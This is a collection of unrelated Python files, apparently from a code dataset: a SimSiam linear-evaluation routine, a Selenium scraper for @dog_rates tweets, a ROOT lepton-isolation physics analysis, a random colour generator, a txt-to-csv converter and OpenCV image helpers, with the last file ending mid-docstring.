from torch.utils.data import Dataset, DataLoader
def supervised_train(train_set, test_set, device, args):
    """Linear-evaluation protocol for a pre-trained SimSiam model.

    Loads the SimSiam checkpoint named by args, freezes the encoder
    backbone, attaches a trainable LinearClassifier, and trains it with SGD
    plus cosine LR decay. Accuracy is reported per epoch and checkpoints are
    saved as 'linear_<checkpoint_name>' every 5 epochs and at the end.
    """
    train_loader = DataLoader(train_set, batch_size=args.eval_batch_size, shuffle=True, num_workers=4)
    test_loader = DataLoader(test_set, batch_size=args.eval_batch_size, shuffle=False, num_workers=4)
    # load pre-trained model
    encoder = Encoder(hidden_dim=args.proj_hidden, output_dim=args.proj_out)
    predictor = Predictor(input_dim=args.proj_out, hidden_dim=args.pred_hidden, output_dim=args.pred_out)
    simsiam = SimSiam(encoder, predictor)
    state_dict = torch.load(os.path.join(args.checkpoint_dir, args.checkpoint_name))
    simsiam.load_state_dict(state_dict['model_state_dict'])
    # remove everything after the backbone and freeze the representations
    model = simsiam.encoder.backbone
    for param in model.parameters():
        param.requires_grad = False
    # add a classifier, which we will train
    input_dim = model.output_dim
    model.classifier = LinearClassifier(input_dim)
    for param in model.classifier.parameters():
        param.requires_grad = True
    model.to(device)
    # Linear LR scaling rule: lr = base_lr * batch_size / 256.
    optimizer = optim.SGD(filter(lambda p: p.requires_grad, model.parameters()),
                          lr=args.eval_base_lr*args.eval_batch_size/256.,
                          momentum=args.eval_momentum,
                          weight_decay=args.eval_weight_decay)
    scheduler = SimpleCosineDecayLR(optimizer, start_epoch=args.init_eval_epoch, final_epoch=args.final_eval_epoch)
    criterion = nn.CrossEntropyLoss()
    # NOTE(review): meters are started at init_pretrain_epoch while the loop
    # runs over eval epochs -- confirm which epoch counter is intended.
    loss_meter = AverageMeter('loss', time_unit='epoch', start_time=args.init_pretrain_epoch)
    train_acc_meter = AverageMeter('train accuracy', time_unit='epoch', start_time=args.init_pretrain_epoch)
    test_acc_meter = AverageMeter('test accuracy', time_unit='epoch', start_time=args.init_pretrain_epoch)
    for epoch in range(args.init_eval_epoch, args.final_eval_epoch + 1, 1):
        print('===Beginning epoch %s===' % epoch)
        start = time.time()
        for batch_id, (data, labels) in enumerate(train_loader):
            data, labels = data.to(device), labels.to(device)
            output = model(data)
            loss = criterion(output, labels)
            loss.backward()
            optimizer.step()
            loss_meter.update(loss.item())
            # Clear gradients after each step (only the classifier has
            # requires_grad=True, the backbone stays frozen).
            model.zero_grad()
            if batch_id % 10 == 0:
                print('Batch %s of %s has loss=%.4f' % (batch_id, len(train_loader), loss.item()))
        end = time.time()
        elapsed = (end - start)
        print('Epoch %s took %.2f seconds' % (epoch, elapsed))
        scheduler.step()
        train_acc = accuracy(model, train_loader, device)
        test_acc = accuracy(model, test_loader, device)
        train_acc_meter.update(train_acc)
        test_acc_meter.update(test_acc)
        print('For epoch %s, accuracy on training is %.2f%%, accuracy on test is %.2f%%' % (epoch, train_acc * 100., test_acc * 100.))
        loss_meter.reset()
        train_acc_meter.reset()
        test_acc_meter.reset()
        # Checkpoint every 5 epochs and always on the final epoch.
        if (epoch % 5 == 0) or (epoch == args.final_eval_epoch):
            torch.save({
                'model_state_dict': model.state_dict(),
                'optimizer_state_dict': optimizer.state_dict(),
                'current_epoch': epoch,
                'loss_meter': loss_meter,
                'train_acc_meter': train_acc_meter,
                'test_acc_meter': test_acc_meter,
                'args': args,
            }, os.path.join(args.checkpoint_dir, 'linear_' + args.checkpoint_name))
if __name__ == '__main__':
    # Entry point: linear evaluation on CIFAR-10 with baseline transforms.
    args = load_args()
    train_set = CIFAR10(root='./data', train=True, download=True, transform=baseline(train=True))
    test_set = CIFAR10(root='./data', train=False, download=True, transform=baseline(train=False))
    use_cuda = torch.cuda.is_available()
    device = torch.device("cuda:0" if use_cuda else "cpu")
    supervised_train(train_set, test_set, device, args)
|
22,093 | bd78f7733e3da1b2eb1bb2829e7cfc74ac1f17bc | import requests
from selenium import webdriver
from bs4 import BeautifulSoup
import time
# Scrape all tweets from @dog_rates between the generated dates using
# Twitter's advanced search, scrolling each result page to load more tweets,
# and save the tweet texts to data.txt.

#Initializing Selenium
driver = webdriver.Firefox()
#List of Dates in YYYY-MM-DD format
dates = []
#Will Store the Tweets
data = []
#Generating Dates
# NOTE(review): day runs 1..31 for every month, so invalid dates such as
# 2015-2-30 are generated too -- presumably Twitter just returns no results
# for those; confirm.
for year in range(2015,2019):
    for month in range(1,13):
        for day in range(1,32):
            date = "{}-{}-{}".format(year,month,day)
            dates.append(date)
#Adding/Removing Dates
dates.append("2019-01-01")
dates = dates[310:]
#Main Method
for date in range(len(dates)-1):
    #Twitter's Advanced Search for user @dog_rates and inbetween two dates
    url = "https://twitter.com/search?l=&q=from%3Adog_rates%20since%3A{}%20until%3A{}&src=typd".format(dates[date],dates[date+1])
    #Loads the webpage
    driver.get(url)
    time.sleep(.5)
    #Variable to indicate if scrolling reached the bottom of the page
    last_height = driver.execute_script("return document.body.scrollHeight")
    #Scrolling to the bottom of the page (at most 30 scrolls per day-page)
    for a in range(30):
        driver.execute_script("window.scrollTo(0, document.body.scrollHeight);")
        time.sleep(1)
        #if the current scroll height is the same as the last one, scrolling has stopped.
        new_height = driver.execute_script("return document.body.scrollHeight")
        if new_height == last_height:
            break
        last_height = new_height
    #Creating BeautifulSoup object
    soup = BeautifulSoup(driver.page_source,"html.parser")
    #Getting Each Tweet's Text
    for tweet in soup.find_all("p",class_="tweet-text"):
        #Stopps picture url from being included in tweet text
        try:
            tweet.a.clear()
        except:
            pass
        #Adding it to master list
        data.append(tweet.text)
    #Logging Information
    print date,len(data)
#Quits Selenium
driver.quit()
#Saving Data
with open("data.txt",'w') as f:
    for a in data:
        f.write(a+"\n")
22,094 | 30697527c66f505a53660f392589917d035f17fa | from backpropagation.NNPrinter import show_neural_network
show_neural_network()
|
22,095 | 207a000c6234e47f95e80a20c1b95e9c6349d069 | import ROOT, math, helper, sys, lib, copy, pickle, os
# definig all the signal regions. here only by name
SRs = [
'B',
'wjets',
'ttjets',
'ttjets_ht200',
'ttjets_ht200met100',
'ttjets_ht300met100',
'ttjets_ht400met120'
]
if not 'loaded' in globals():
print 'loaded is not in globals'
global loaded
loaded = False
if not loaded:
## One helper.sample per physics process; each points at its same-sign (SS)
## closure-test ntuple.  NOTE(review): helper, SRs, os and pickle are assumed
## to be imported earlier in this file (not visible in this chunk).
ttjets_sl = helper.sample('ttjets_sl','../closureTest/ttjets_semi_closureOutput_SS.root' )
ttjets_fl = helper.sample('ttjets_fl','../closureTest/ttjets_full_closureOutput_SS.root' )
ttjets_ha = helper.sample('ttjets_ha','../closureTest/ttjets_hadronic_closureOutput_SS.root' )
singletop = helper.sample('singletop','../closureTest/singletop_closureOutput_SS.root' )
wjets = helper.sample('wjets' ,'../closureTest/wnjets_closureOutput_SS.root' )
rares = helper.sample('rares' ,'../closureTest/rares_closureOutput_SS.root')
#qcdmuenr = helper.sample('qcdmuenr' ,'../closureTest/qcdmuenr_closureOutput_SS.root')
# dyjets = helper.sample('dyjets' ,'../closureTest/dyjets_closureOutput.root' )
doublemu = helper.sample('doublemu' ,'../closureTest/doublemu_closureOutput_SS.root')
doubleel = helper.sample('doubleel' ,'../closureTest/doubleel_closureOutput_SS.root')
samples = [ rares, wjets, ttjets_fl, ttjets_sl, ttjets_ha, singletop, doublemu, doubleel]
#samples = [ ttjets_sl]
# Attach one region object per signal region (SR) to every sample.
for sample in samples:
    for sr in SRs:
        sample.regions.append(helper.region(sample.name, sr))
# If a pickled version of a sample already exists on disk, restore it and
# flag it as loaded so the event loop below skips re-processing it.
for i in range(len(samples)):
    f = 'samples/'+samples[i].name+'.pk'
    if os.path.isfile(f):
        f= open(f, 'rb')
        print 'for sample', samples[i].name, 'file exists. loading', f
        samples[i] = pickle.load(f)
        samples[i].loaded = True
        f.close()
# Re-bind the module-level names to the (possibly unpickled) list entries.
# generator.next() is Python 2 syntax (would be next(gen) in Python 3).
doublemu = (x for x in samples if x.name == 'doublemu' ).next()
doubleel = (x for x in samples if x.name == 'doubleel' ).next()
ttjets_fl = (x for x in samples if x.name == 'ttjets_fl').next()
ttjets_sl = (x for x in samples if x.name == 'ttjets_sl').next()
ttjets_ha = (x for x in samples if x.name == 'ttjets_ha').next()
singletop = (x for x in samples if x.name == 'singletop').next()
#qcdmuenr = (x for x in samples if x.name == 'qcdmuenr' ).next()
rares = (x for x in samples if x.name == 'rares' ).next()
wjets = (x for x in samples if x.name == 'wjets' ).next()
#dyjets = (x for x in samples if x.name == 'dyjets' ).next()
samples = [ rares, wjets, ttjets_fl, ttjets_sl, ttjets_ha, singletop, doublemu, doubleel]
#samples = [ ttjets_sl]
trigger = 1  # if nonzero, events failing passTrigger are skipped below
maxev = 10E20  # effectively unlimited number of events to process
## Main event loop: for every sample not restored from a pickle, book the
## isolation / impact-parameter histograms per region, then loop once over
## the sample's tree filling histograms and tight/loose counting categories.
for sample in samples:
    print '--------------------------------------------'
    print 'AT SAMPLE:', sample.name
    print '--------------------------------------------'
    if sample.loaded == True: continue
    print 'loading sample', sample.name
    for sr in sample.regions: ## initialize all the histograms for all the regions
        i=0
        ## muons
        sr.histos['muiso' ] = ROOT.TH1F('muIso_' +sr.name+'_'+sample.name, 'muIso_' +sr.name+'_'+sample.name, 40, 0., 1.0)
        sr.histos['muisoTL' ] = ROOT.TH1F('muIsoTL_' +sr.name+'_'+sample.name, 'muIsoTL_' +sr.name+'_'+sample.name, 40, 0., 1.0)
        sr.histos['muisoT' ] = ROOT.TH1F('muIsoT_' +sr.name+'_'+sample.name, 'muIsoT_' +sr.name+'_'+sample.name, 40, 0., 1.0)
        sr.histos['muisoL' ] = ROOT.TH1F('muIsoL_' +sr.name+'_'+sample.name, 'muIsoL_' +sr.name+'_'+sample.name, 40, 0., 1.0)
        sr.histos['muisoTLT'] = ROOT.TH1F('muIsoTLT_'+sr.name+'_'+sample.name, 'muIsoTLT_'+sr.name+'_'+sample.name, 40, 0., 1.0)
        sr.histos['muisoTLL'] = ROOT.TH1F('muIsoTLL_'+sr.name+'_'+sample.name, 'muIsoTLL_'+sr.name+'_'+sample.name, 40, 0., 1.0)
        sr.histos['muip' ] = ROOT.TH1F('muIP_' +sr.name+'_'+sample.name, 'muIP_' +sr.name+'_'+sample.name, 40, 0., 0.1)
        sr.histos['muipTL' ] = ROOT.TH1F('muIPTL_' +sr.name+'_'+sample.name, 'muIPTL_' +sr.name+'_'+sample.name, 40, 0., 0.1)
        ## electrons
        sr.histos['eliso' ] = ROOT.TH1F('elIso_' +sr.name+'_'+sample.name, 'elIso_' +sr.name+'_'+sample.name, 20, 0., 0.6)
        sr.histos['elisoTL' ] = ROOT.TH1F('elIsoTL_' +sr.name+'_'+sample.name, 'elIsoTL_' +sr.name+'_'+sample.name, 20, 0., 0.6)
        sr.histos['elisoT' ] = ROOT.TH1F('elIsoT_' +sr.name+'_'+sample.name, 'elIsoT_' +sr.name+'_'+sample.name, 20, 0., 0.6)
        sr.histos['elisoL' ] = ROOT.TH1F('elIsoL_' +sr.name+'_'+sample.name, 'elIsoL_' +sr.name+'_'+sample.name, 20, 0., 0.6)
        sr.histos['elisoTLT'] = ROOT.TH1F('elIsoTLT_'+sr.name+'_'+sample.name, 'elIsoTLT_'+sr.name+'_'+sample.name, 20, 0., 0.6)
        sr.histos['elisoTLL'] = ROOT.TH1F('elIsoTLL_'+sr.name+'_'+sample.name, 'elIsoTLL_'+sr.name+'_'+sample.name, 20, 0., 0.6)
        sr.histos['elip' ] = ROOT.TH1F('elIP_' +sr.name+'_'+sample.name, 'elIP_' +sr.name+'_'+sample.name, 20, 0., 0.1)
        sr.histos['elipTL' ] = ROOT.TH1F('elIPTL_' +sr.name+'_'+sample.name, 'elIPTL_' +sr.name+'_'+sample.name, 20, 0., 0.1)
        # Enable per-bin sum-of-weights-squared error tracking.
        for key, value in sr.histos.items():
            value.Sumw2()
    ## loop over the tree
    for evt in sample.tree:
        i += 1
        if i > maxev:
            continue
        if trigger and evt.passTrigger == 0: continue
        weight = evt.lumiW
        # NOTE(review): `type` shadows the builtin; kept as in the original.
        type = evt.type
        if type > 2:
            type -= 3  # fold categories 3-5 onto 0-2 (same flavour pairing)
        if not evt.type in [0, 2]: continue # look only at mumu and elel
        for sr in sample.regions:
            if not helper.passRegion(sr.name, evt): continue
            ## Fill the muons isolation for both muons regardless of tight/loose, but same-sign
            if evt.type in [0]:
                sr.histos['muiso' ].Fill(evt.iso1, weight*evt.puW)
                sr.histos['muiso' ].Fill(evt.iso2, weight*evt.puW)
                # T/L histograms: the lepton with the smaller iso is "tight".
                sr.histos['muisoT' ].Fill(evt.iso1 if evt.iso1 <= evt.iso2 else evt.iso2, weight*evt.puW)
                sr.histos['muisoL' ].Fill(evt.iso2 if evt.iso1 <= evt.iso2 else evt.iso1, weight*evt.puW)
                sr.histos['muip' ].Fill(evt.ip1 , weight*evt.puW)
                sr.histos['muip' ].Fill(evt.ip2 , weight*evt.puW)
                if evt.tlcat in [1,2]:  # tight-loose / loose-tight events only
                    sr.histos['muisoTL' ].Fill(evt.iso1, weight*evt.puW)
                    sr.histos['muisoTL' ].Fill(evt.iso2, weight*evt.puW)
                    sr.histos['muisoTLT'].Fill(evt.iso1 if evt.iso1 <= evt.iso2 else evt.iso2, weight*evt.puW)
                    sr.histos['muisoTLL'].Fill(evt.iso2 if evt.iso1 <= evt.iso2 else evt.iso1, weight*evt.puW)
                    sr.histos['muipTL' ].Fill(evt.ip1 , weight*evt.puW)
                    sr.histos['muipTL' ].Fill(evt.ip2 , weight*evt.puW)
            # NOTE(review): this branch is unreachable -- type 1 (emu) events
            # are filtered out by the `evt.type in [0, 2]` cut above.
            if evt.type in [1]:
                sr.histos['muiso'].Fill(evt.iso1, weight*evt.puW)
                sr.histos['eliso'].Fill(evt.iso2, weight*evt.puW)
            if evt.type in [2]:
                sr.histos['eliso' ].Fill(evt.iso1, weight*evt.puW)
                sr.histos['eliso' ].Fill(evt.iso2, weight*evt.puW)
                sr.histos['elisoT' ].Fill(evt.iso1 if evt.iso1 <= evt.iso2 else evt.iso2, weight*evt.puW)
                sr.histos['elisoL' ].Fill(evt.iso2 if evt.iso1 <= evt.iso2 else evt.iso1, weight*evt.puW)
                sr.histos['elip' ].Fill(evt.ip1 , weight*evt.puW)
                sr.histos['elip' ].Fill(evt.ip2 , weight*evt.puW)
                if evt.tlcat in [1,2]:
                    sr.histos['elisoTL'].Fill(evt.iso1, weight*evt.puW)
                    sr.histos['elisoTL'].Fill(evt.iso2, weight*evt.puW)
                    sr.histos['elisoTLT'].Fill(evt.iso1 if evt.iso1 <= evt.iso2 else evt.iso2, weight*evt.puW)
                    sr.histos['elisoTLL'].Fill(evt.iso2 if evt.iso1 <= evt.iso2 else evt.iso1, weight*evt.puW)
                    sr.histos['elipTL' ].Fill(evt.ip1 , weight*evt.puW)
                    sr.histos['elipTL' ].Fill(evt.ip2 , weight*evt.puW)
            # Accumulate prompt/fake prediction sums and their squares
            # (the *2 members are used later for the statistical errors).
            sr.cats[type].npp += evt.npp*weight
            sr.cats[type].npf += evt.npf*weight
            sr.cats[type].nfp += evt.nfp*weight
            sr.cats[type].nff += evt.nff*weight
            sr.cats[type].npp2 += evt.npp*evt.npp*weight*weight
            sr.cats[type].npf2 += evt.npf*evt.npf*weight*weight
            sr.cats[type].nfp2 += evt.nfp*evt.nfp*weight*weight
            sr.cats[type].nff2 += evt.nff*evt.nff*weight*weight
            # NOTE(review): `is` identity comparison against small ints works
            # under CPython's int caching, but `==` would be the correct form.
            if evt.tlcat is 0:
                sr.cats[type].ntt +=weight
                sr.cats[type].ntt2 +=weight*weight
                sr.cats[type].nttc +=1
            elif evt.tlcat is 1:
                sr.cats[type].ntl +=weight
                sr.cats[type].ntl2 +=weight*weight
                sr.cats[type].ntlc +=1
            elif evt.tlcat is 2:
                sr.cats[type].nlt +=weight
                sr.cats[type].nlt2 +=weight*weight
                sr.cats[type].nltc +=1
            elif evt.tlcat is 3:
                sr.cats[type].nll +=weight
                sr.cats[type].nll2 +=weight*weight
                sr.cats[type].nllc +=1
            # Kinematic histograms per systematic variation; overflow values
            # are pushed into the last visible bin.  tlcat 1 and 2 are both
            # filled into the merged 'tl' histogram.
            for sys in ['nom', 'jesup', 'jesdn', 'jer', 'bup', 'bdn']:
                for var in ['met', 'ht', 'nj', 'nb']:
                    val = helper.getValue(var, sys, evt)
                    maxval = sr.cats[type].histos[sys][var]['tt'].GetXaxis().GetXmax()
                    if evt.tlcat is 0:
                        sr.cats[type].histos[sys][var]['tt'].Fill(val if val < maxval else maxval - 0.0001, weight)
                    elif evt.tlcat is 1:
                        sr.cats[type].histos[sys][var]['tl'].Fill(val if val < maxval else maxval - 0.0001, weight)
                    elif evt.tlcat is 2:
                        sr.cats[type].histos[sys][var]['tl'].Fill(val if val < maxval else maxval - 0.0001, weight)
                    elif evt.tlcat is 3:
                        sr.cats[type].histos[sys][var]['ll'].Fill(val if val < maxval else maxval - 0.0001, weight)
    sample.loaded = True
# Cache every freshly processed sample to disk (existing pickles are kept).
for sample in samples:
    if not os.path.isfile('samples/'+sample.name+'.pk'):
        pickle.dump(sample, open('samples/'+sample.name+'.pk','wb'), pickle.HIGHEST_PROTOCOL)
## adding up all the samples
# Build one summed MC "total" pseudo-sample (data samples are excluded).
totals = helper.sample('total','')
for sample in samples:
    if sample.isdata: continue
    totals += sample
samples.append(totals)
loaded = True
def isoplots(region):
    """Draw data/MC stacks of the isolation and impact-parameter histograms
    for one signal region and save them under figs/.

    region -- name of the signal region (must be an entry of SRs).
    """
    ROOT.gROOT.SetBatch()  # draw off-screen, no GUI windows
    reg = SRs.index(region)
    for key in samples[0].regions[reg].histos.keys():
        if not key in ['muiso', 'muisoT', 'muisoL', 'muisoTL', 'muisoTLT', 'muisoTLL', 'muip', 'muipTL',
                       'eliso', 'elisoT', 'elisoL', 'elisoTL', 'elisoTLT', 'elisoTLL', 'elip', 'elipTL' ]: continue
        # Book a fresh legend and MC stack per histogram key.
        if 'mu' in key:
            mulegend = lib.makeLegend(0.4, 0.6, 0.6, 0.87)
            mulegend.SetTextSize(0.04)
            mumcstack = ROOT.THStack('mumcstack', 'mumcstack')
            mumcint = 0.
        if 'el' in key:
            ellegend = lib.makeLegend(0.6, 0.6, 0.8, 0.8)
            ellegend.SetTextSize(0.04)
            elmcstack = ROOT.THStack('elmcstack', 'elmcstack')
            elmcint = 0.
        # Stack all MC samples (skip the summed total and the data samples).
        for sample in samples:
            if sample == totals or sample.isdata: continue
            #muons
            if 'mu' in key:
                sample.regions[reg].histos[key].SetFillColor(sample.color)
                mumcint += sample.regions[reg].histos[key].Integral()
                mumcstack.Add(sample.regions[reg].histos[key])
                mulegend.AddEntry(sample.regions[reg].histos[key], sample.name, 'f')
            #electrons
            if 'el' in key:
                sample.regions[reg].histos[key].SetFillColor(sample.color)
                elmcint += sample.regions[reg].histos[key].Integral()
                elmcstack.Add(sample.regions[reg].histos[key])
                ellegend.AddEntry(sample.regions[reg].histos[key], sample.name, 'f')
        # Overlay the corresponding data sample and save the canvases.
        if 'mu' in key:
            mulegend.AddEntry(doublemu.regions[reg].histos[key], doublemu.name, 'pe')
            mufunc = helper.canvasWithRatio(mumcstack, doublemu.regions[reg].histos[key], mulegend)
            cmu = mufunc[0] #don't ask me why this is necessary
            cmu.Update()
            cmu.Draw()
            helper.saveAll(cmu, 'figs/'+key+'_sideband_'+samples[0].regions[reg].name)
        if 'el' in key:
            ellegend.AddEntry(doubleel.regions[reg].histos[key], doubleel.name, 'pe')
            elfunc = helper.canvasWithRatio(elmcstack, doubleel.regions[reg].histos[key], ellegend)
            cel = elfunc[0] #don't ask me why this is necessary
            cel.Update()
            cel.Draw()
            helper.saveAll(cel, 'figs/'+key+'_sideband_'+samples[0].regions[reg].name)
    return
incQCD = False  # when False, samples with 'qcd' in the name are excluded from the plots
def kinematicDistributions(region):
    """Plot data/MC stacks of the kinematic variables (met, ht, nj, nb) for
    each tight/loose type and each systematic variation, saving to figs/.

    region -- name of the signal region (must be an entry of SRs).
    """
    ROOT.gROOT.SetBatch()  # draw off-screen, no GUI windows
    for var in samples[0].regions[0].mm.histos['nom'].keys():
        print 'at variable:', var
        for t in ['tt', 'tl', 'll']:
            print 'at type:', t
            for sys in ['nom', 'jesup', 'jesdn', 'jer', 'bup', 'bdn']:
                print 'at systematic:', sys
                legend = lib.makeLegend(0.6, 0.6, 0.8, 0.87)
                legend.SetTextSize(0.04)
                mcstack = ROOT.THStack('mcstack', 'mcstack')
                mcint = 0.
                for sample in samples:
                    if incQCD == False:
                        if 'qcd' in sample.name: continue
                    if sample == totals or sample.isdata: continue
                    #
                    reg = SRs.index(region)
                    print sample.name
                    sample.regions[reg].mm.histos[sys][var][t].SetFillColor(sample.color)
                    mcint += sample.regions[reg].mm.histos[sys][var][t].Integral()
                    mcstack.Add(sample.regions[reg].mm.histos[sys][var][t])
                    legend.AddEntry(sample.regions[reg].mm.histos[sys][var][t], sample.name, 'f')
                # Overlay the double-muon data on the MC stack.
                legend.AddEntry(doublemu.regions[reg].mm.histos[sys][var][t], doublemu.name, 'pe')
                func = helper.canvasWithRatio(mcstack, doublemu.regions[reg].mm.histos[sys][var][t], legend)
                c = func[0] #don't ask me why this is necessary
                print c.ls()
                c.Update()
                c.FindObject('ratio').GetXaxis().SetTitle(helper.getLatexVariable(var))
                c.FindObject('mcstack').SetTitle(helper.getLatexType(t))
                c.Draw()
                helper.saveAll(c, 'figs/'+var+'_'+doublemu.regions[reg].name+'_'+sys+'_'+t)
    return
def printout():
    """Print tight/loose (NTT/NTL/NLT/NLL) and prompt/fake (NPP/NPF/NFP/NFF)
    yield tables for every signal region and lepton-flavour category."""
    # Derive totals and statistical errors from the accumulated sums of
    # squares filled in the main event loop.
    for sample in samples:
        for region in sample.regions:
            for cat in region.cats:
                cat.fakes = cat.npf+cat.nfp+cat.nff
                cat.obs = cat.ntt
                cat.ntte , cat.ntle , cat.nlte , cat.nlle = math.sqrt(cat.ntt2), math.sqrt(cat.ntl2), math.sqrt(cat.nlt2), math.sqrt(cat.nll2)
                cat.nttce, cat.ntlce, cat.nltce, cat.nllce = math.sqrt(cat.nttc), math.sqrt(cat.ntlc), math.sqrt(cat.nltc), math.sqrt(cat.nllc)
                cat.nppe , cat.npfe , cat.nfpe , cat.nffe = math.sqrt(cat.npp2), math.sqrt(cat.npf2), math.sqrt(cat.nfp2), math.sqrt(cat.nff2)
                cat.fakese = cat.npfe+cat.nfpe+cat.nffe
                cat.obse = cat.ntte
    for r in range(len(SRs)):
        for i in range(3): ## loop on all the categories
            print i
            print '\n\n\n'
            print '=============================================================================================================='
            print ' CATEGORY:', samples[0].regions[r].cats[i].name
            print '=============================================================================================================='
            print '%10s | %10s%9s | %10s%9s | %10s%9s | %10s%9s || %10s%9s' %('SAMPLE', 'NTT','', 'NTL','', 'NLT','', 'NLL','', 'SUM','')
            print '--------------------------------------------------------------------------------------------------------------'
            for sample in samples:
                if sample.name == 'total': continue
                if samples.index(sample) == len(samples) -1:
                    print '--------------------------------------------------------------------------------------------------------------'
                print '%10s | %10.2f +- %5.2f | %10.2f +- %5.2f | %10.2f +- %5.2f | %10.2f +- %5.2f || %10.2f +- %5.2f' %(
                    sample.name, sample.regions[r].cats[i].ntt, sample.regions[r].cats[i].ntte, sample.regions[r].cats[i].ntl, sample.regions[r].cats[i].ntle, sample.regions[r].cats[i].nlt, sample.regions[r].cats[i].nlte, sample.regions[r].cats[i].nll, sample.regions[r].cats[i].nlle, sample.regions[r].cats[i].ntt+sample.regions[r].cats[i].ntl+sample.regions[r].cats[i].nlt+sample.regions[r].cats[i].nll, sample.regions[r].cats[i].ntte+sample.regions[r].cats[i].ntle+sample.regions[r].cats[i].nlte+sample.regions[r].cats[i].nlle)
            print '--------------------------------------------------------------------------------------------------------------'
            print '--------------------------------------------------------------------------------------------------------------'
            print '%10s | %10s%9s | %10s%9s | %10s%9s | %10s%9s || %10s%9s' %('SAMPLE', 'NPP','', 'NPF','', 'NFP','', 'NFF','', 'SUM','')
            print '--------------------------------------------------------------------------------------------------------------'
            for sample in samples:
                if sample.name == 'total': continue
                if samples.index(sample) == len(samples) -1:
                    print '--------------------------------------------------------------------------------------------------------------'
                print '%10s | %10.2f +- %5.2f | %10.2f +- %5.2f | %10.2f +- %5.2f | %10.2f +- %5.2f || %10.2f +- %5.2f' %(
                    sample.name, sample.regions[r].cats[i].npp, sample.regions[r].cats[i].nppe, sample.regions[r].cats[i].npf, sample.regions[r].cats[i].npfe, sample.regions[r].cats[i].nfp, sample.regions[r].cats[i].nfpe, sample.regions[r].cats[i].nff, sample.regions[r].cats[i].nffe, sample.regions[r].cats[i].npp+sample.regions[r].cats[i].npf+sample.regions[r].cats[i].nfp+sample.regions[r].cats[i].nff, sample.regions[r].cats[i].nppe+sample.regions[r].cats[i].npfe+sample.regions[r].cats[i].nfpe+sample.regions[r].cats[i].nffe)
            #print '--------------------------------------------------------------------------------------------------------------'
            #print 'OBSERVED : %.2f +- %.2f' %(totals.regions[r].cats[i].obs , totals.regions[r].cats[i].ntte)
            #print 'SUM OF FAKES : %.2f +- %.2f' %(totals.regions[r].cats[i].fakes, totals.regions[r].cats[i].npfe+totals.regions[r].cats[i].nfpe+totals.regions[r].cats[i].nffe)
            #if totals.cats[i].obs > 0:
            # res = helper.divWithErr(totals.regions[r].cats[i].fakes, totals.regions[r].cats[i].fakese, totals.regions[r].cats[i].obs, totals.regions[r].cats[i].obse)
            # relres = helper.divWithErr(totals.regions[r].cats[i].fakes - totals.regions[r].cats[i].obs, totals.regions[r].cats[i].fakese - totals.regions[r].cats[i].obse, totals.regions[r].cats[i].fakes, totals.regions[r].cats[i].fakese)
            #else:
            # res = [0,0]
            # relres = [0,0]
            #print '\n------------------------------------------'
            #print '%25s %.3f +- %.3f' %('pred./ obs.:', res[0], res[1])
            #print '\n%25s %.3f +- %.3f' %('(pred. - obs.) / pred.:', relres[0], relres[1])
            #print '------------------------------------------'
            #
            # print '\n \nPURE COUNTS:'
            # print '%10s%9s | %10s%9s | %10s%9s | %10s%9s || %10s%9s' %('NTT','', 'NTL','', 'NLT','', 'NLL','', 'SUM','')
            # print '--------------------------------------------------------------------------------------------------------------'
            # if samples.index(sample) == len(samples) -1:
            # print '--------------------------------------------------------------------------------------------------------------'
            # print '%10.2f +- %5.2f | %10.2f +- %5.2f | %10.2f +- %5.2f | %10.2f +- %5.2f || %10.2f +- %5.2f' %(
            # sample.cats[i].nttc, sample.cats[i].nttce, sample.cats[i].ntlc, sample.cats[i].ntlce, sample.cats[i].nltc, sample.cats[i].nltce, sample.cats[i].nllc, sample.cats[i].nllce, sample.cats[i].nttc+sample.cats[i].ntlc+sample.cats[i].nltc+sample.cats[i].nllc, sample.cats[i].nttce+sample.cats[i].ntlce+sample.cats[i].nltce+sample.cats[i].nllce)
    #
    # NOTE(review): original indentation was lost; `sample` here is the loop
    # variable leaked from the loops above, so this closes only the file of
    # the last sample iterated -- confirm the intended scope.
    sample.file.Close()
# Script entry point; the analysis steps are run manually by uncommenting
# the calls below (note: printout/kinematicDistributions/isoplots all take a
# region-name argument when enabled where applicable).
if __name__ == '__main__':
    print 'in function main'
    #printout()
    #kinematicDistributions()
    #isoplots()
|
22,096 | 0cbcdd4950e46dae335171f0e095fce813d6b754 | import random
# Hexadecimal digits a CSS colour code may contain.
nums = ["0", "1", "2", "3", "4", "5", "6", "7", "8", "9",
        "a", "b", "c", "d", "e", "f"]

# Draw six digits independently (with replacement) -- the same distribution
# as six separate random.choice calls -- and assemble "#rrggbb".
fgcolor = "#" + "".join(random.choices(nums, k=6))
print(fgcolor)
22,097 | 8306f48914831695fec6ef84179d9cec110610a9 | #-*- coding: utf-8 -*-
def get_lines(filepath):
    """Return all lines (trailing newlines included) of ``<filepath>.txt``.

    filepath -- path to the input file WITHOUT the '.txt' extension.
    """
    with open(filepath + '.txt') as file_object:
        # readlines() already returns a list; the original wrapped it in an
        # extra, redundant list() copy.
        return file_object.readlines()
def new_csv(lines, filepath):
    """Write ``lines`` to ``<filepath>.csv``, one stripped line per row.

    Each input line is stripped of surrounding whitespace and written back
    followed by a single '\\n'.

    lines    -- iterable of text lines (as returned by get_lines).
    filepath -- path of the output file WITHOUT the '.csv' extension.
    """
    count = len(lines)
    print("总行数:" + str(count))  # prints the total line count
    # Context manager guarantees the file is closed even if a write fails
    # (the original used a bare open()/close() pair and also carried an
    # unused `fileindex` and a pointless `index += 1`).
    with open(filepath + '.csv', 'w') as fp:
        for line in lines:
            fp.write(line.strip())  # strip leading/trailing whitespace
            fp.write('\n')
if __name__ == "__main__":
    # Convert demo_airhistory.txt into demo_airhistory.csv.
    source = "demo_airhistory"
    new_csv(get_lines(source), source)
22,098 | 4725f074c9c78bd6c4d55f3a598fe8cd249782a8 | import os
import cv2
def create_folder(directory):
    """Create ``directory`` (including parents) if it does not already exist.

    Failures are reported on stdout instead of raising, matching the
    best-effort error style of the other helpers in this module.
    """
    try:
        # exist_ok avoids the check-then-create race of the original
        # `if not os.path.exists(...)` guard.
        os.makedirs(directory, exist_ok=True)
    except OSError:
        print('Error: Creating directory. ' + directory)
def read_image(input_image):
    '''
    Read an image file and return an OpenCV image object.

    Returns None when the file cannot be read: cv2.imread does not raise on
    a missing or unreadable file, it returns None -- the original left
    `image` unbound on the exception path, so `return image` raised
    UnboundLocalError instead of surfacing the failure.
    '''
    image = None  # ensure a defined return value even if imread raises
    try:
        image = cv2.imread(input_image)
    except AttributeError:
        print(f"Input file '{input_image}' is not valid.")
    except Exception as e:
        print(e)
    return image
def show_image_opencv(image_instance, name="Image in OpenCV"):
    '''
    Display an image in an OpenCV popup window titled ``name``.
